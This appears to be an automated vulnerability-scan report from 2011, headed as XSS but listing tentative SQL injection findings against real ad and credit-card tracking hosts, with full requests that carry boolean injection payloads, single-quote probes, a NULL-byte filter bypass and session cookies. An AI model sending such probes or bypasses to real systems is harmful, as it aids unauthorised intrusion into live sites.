XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 06172011-01

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5 [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033%5E924216%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=;ord=7008281818?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308247910801&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 602
Date: Thu, 16 Jun 2011 18:12:38 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/c/b4/%2a/n;223454979;0-0;0;56063734;4307-300/250;39046206/39063963/3;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033%5E924216%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=http%3a%2f%2fwww.fool.com/fool/free-report/15/rb-billgates-displayexternal-68077.aspx%3Faid%3D3776%26logvisit%3Dy%26source%3Derbatrbox0860010"><img src="http://s0.2mdn.net/viewad/1452306/1-15_DeathPCVideoOPWSJ_300x250.gif" border=0 alt="Advertisement"></a>');

Request 2

GET /adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033%5E924216%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=;ord=7008281818?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308247910801&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 614
Date: Thu, 16 Jun 2011 18:12:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/c/b4/%2a/b;223454979;3-0;0;56063734;4307-300/250;42129357/42147144/2;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033%5E924216%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=http%3a%2f%2fwww.fool.com/fool/free-report/15/rb-ultimatewireless-displayexternal-107046.aspx%3Faid%3D4062%26logvisit%3Dy%26source%3Derbatrbox0860012"><img src="http://s0.2mdn.net/viewad/1452306/1-15_iPhone5IsCome_BlackHL_300x250.gif" border=0 alt="Advertisement"></a>');

1.2. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s92218100172467 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cctrkom.creditcards.com
Path:	/b/ss/ccardsccdc-us/1/H.17/s92218100172467

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/ccardsccdc-us%00'/1/H.17/s92218100172467?AQB=1&ndh=1&t=17/5/2011%205%3A41%3A25%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%27%26pg%3D1477%26pgpos%3D1&r=http%3A//burp/show/10&cc=USD&xact=1012011061705403763827581&purchaseID=1012011061705403763827581&events=purchase%2Cevent2&products=1477%3B22145581%27%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705403763827581&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%27%7C1&v30=1477%3A22145581%27&v31=22145581%27%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581'&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:58:59 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/ccardsccdc-us was not found on this server.</p>
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/ccardsccdc-us%00''/1/H.17/s92218100172467?AQB=1&ndh=1&t=17/5/2011%205%3A41%3A25%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%27%26pg%3D1477%26pgpos%3D1&r=http%3A//burp/show/10&cc=USD&xact=1012011061705403763827581&purchaseID=1012011061705403763827581&events=purchase%2Cevent2&products=1477%3B22145581%27%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705403763827581&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%27%7C1&v30=1477%3A22145581%27&v31=22145581%27%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581'&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:59:00 GMT
Server: Omniture DC/2.0.0
xserver: www619
Content-Length: 0
Content-Type: text/html

1.3. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s93293816028162 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cctrkom.creditcards.com
Path:	/b/ss/ccardsccdc-us/1/H.17/s93293816028162

Issue detail

Request 1

GET /b'/ss/ccardsccdc-us/1/H.17/s93293816028162?AQB=1&ndh=1&t=17/5/2011%205%3A39%3A33%205%20300&ns=creditcardscom&pageName=home&g=http%3A//www.creditcards.com/&cc=USD&ch=home&v0=999-0-0-0&c1=home&c9=5%3A30AM&c10=Friday&c11=Weekday&v14=999-0-0-0&v15=5%3A30AM&v16=Friday&v17=Weekday&v28=home&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307173398%27%5D%5D

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:51:39 GMT
Server: Omniture DC/2.0.0
Content-Length: 443
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/ccardsccdc-us/1/H.17/s93293816028162 was not f
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/ccardsccdc-us/1/H.17/s93293816028162?AQB=1&ndh=1&t=17/5/2011%205%3A39%3A33%205%20300&ns=creditcardscom&pageName=home&g=http%3A//www.creditcards.com/&cc=USD&ch=home&v0=999-0-0-0&c1=home&c9=5%3A30AM&c10=Friday&c11=Weekday&v14=999-0-0-0&v15=5%3A30AM&v16=Friday&v17=Weekday&v28=home&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307173398%27%5D%5D

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:51:39 GMT
Server: Omniture DC/2.0.0
xserver: www597
Content-Length: 0
Content-Type: text/html

1.4. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s95104773896746 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cctrkom.creditcards.com
Path:	/b/ss/ccardsccdc-us/1/H.17/s95104773896746

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /b/ss%00'/ccardsccdc-us/1/H.17/s95104773896746?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A9%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22105064%26pg%3D1477%26pgpos%3D2&cc=USD&xact=1012011061705400871194905&purchaseID=1012011061705400871194905&events=purchase%2Cevent2&products=1477%3B22105064%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705400871194905&v15=5%3A30AM&c16=2&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=2&v28=lead%20confirmation&v29=1477%3A22105064%7C2&v30=1477%3A22105064&v31=22105064%7C2&v32=1477%7C2&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105064&pg=1477&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:55:01 GMT
Server: Omniture DC/2.0.0
Content-Length: 405
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/ccardsccdc-us/1/H.17/s95104773896746?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A9%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22105064%26pg%3D1477%26pgpos%3D2&cc=USD&xact=1012011061705400871194905&purchaseID=1012011061705400871194905&events=purchase%2Cevent2&products=1477%3B22105064%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705400871194905&v15=5%3A30AM&c16=2&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=2&v28=lead%20confirmation&v29=1477%3A22105064%7C2&v30=1477%3A22105064&v31=22105064%7C2&v32=1477%7C2&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105064&pg=1477&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:55:01 GMT
Server: Omniture DC/2.0.0
xserver: www608
Content-Length: 0
Content-Type: text/html

1.5. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s95972011631820 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cctrkom.creditcards.com
Path:	/b/ss/ccardsccdc-us/1/H.17/s95972011631820

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /b%00'/ss/ccardsccdc-us/1/H.17/s95972011631820?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A20%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22125744%26pg%3D1477%26pgpos%3D5&cc=USD&xact=1012011061705401932014371&purchaseID=1012011061705401932014371&events=purchase%2Cevent2&products=1477%3B22125744%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705401932014371&v15=5%3A30AM&c16=5&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=5&v28=lead%20confirmation&v29=1477%3A22125744%7C5&v30=1477%3A22125744&v31=22125744%7C5&v32=1477%7C5&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22125744&pg=1477&pgpos=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:55:01 GMT
Server: Omniture DC/2.0.0
Content-Length: 402
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/ccardsccdc-us/1/H.17/s95972011631820?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A20%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22125744%26pg%3D1477%26pgpos%3D5&cc=USD&xact=1012011061705401932014371&purchaseID=1012011061705401932014371&events=purchase%2Cevent2&products=1477%3B22125744%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705401932014371&v15=5%3A30AM&c16=5&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=5&v28=lead%20confirmation&v29=1477%3A22125744%7C5&v30=1477%3A22125744&v31=22125744%7C5&v32=1477%7C5&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22125744&pg=1477&pgpos=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:55:01 GMT
Server: Omniture DC/2.0.0
xserver: www608
Content-Length: 0
Content-Type: text/html

1.6. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s9749755890574 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cctrkom.creditcards.com
Path:	/b/ss/ccardsccdc-us/1/H.17/s9749755890574

Issue detail

Remediation detail

Request 1

GET /b/ss%00'/ccardsccdc-us/1/H.17/s9749755890574?AQB=1&ndh=1&t=17/5/2011%205%3A40%3A8%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%26pg%3D1477%26pgpos%3D1&cc=USD&xact=1012011061705400772499673&purchaseID=1012011061705400772499673&events=purchase%2Cevent2&products=1477%3B22145581%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705400772499673&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%7C1&v30=1477%3A22145581&v31=22145581%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
